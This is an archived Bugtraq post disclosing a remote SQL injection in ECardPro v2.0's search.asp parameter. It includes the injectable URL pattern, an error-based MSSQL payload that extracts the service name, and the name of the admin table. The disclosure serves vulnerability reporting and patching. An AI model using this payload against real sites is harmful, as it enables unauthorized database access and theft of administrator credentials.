Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability
From: ajannhwt () hotmail com
Date: 17 Sep 2006 13:29:20 -0000
Vulnerability Report
*******************************************************************************
# Title  :  ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability

# Author :   ajann

# Script Page : http://www.keyvan1.com

# Exploit;

*******************************************************************************

Data: MSSQL

###http://[target]/[path]/search.asp?keyword='[SQL HERE]

Example: search.asp?keyword='AND%201=convert(int,%20@@servicename) ==> MSSQL Service Name

Admin Table: "admin"
etc(systemtables,union,update,select)......


# ajann,Turkey
# ...
# Im not Hacker!

  By Date           By Thread  

Current thread:
  • ECardPro v2.0(search.asp) Remote SQL Injection Vulnerability ajannhwt (Sep 18)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]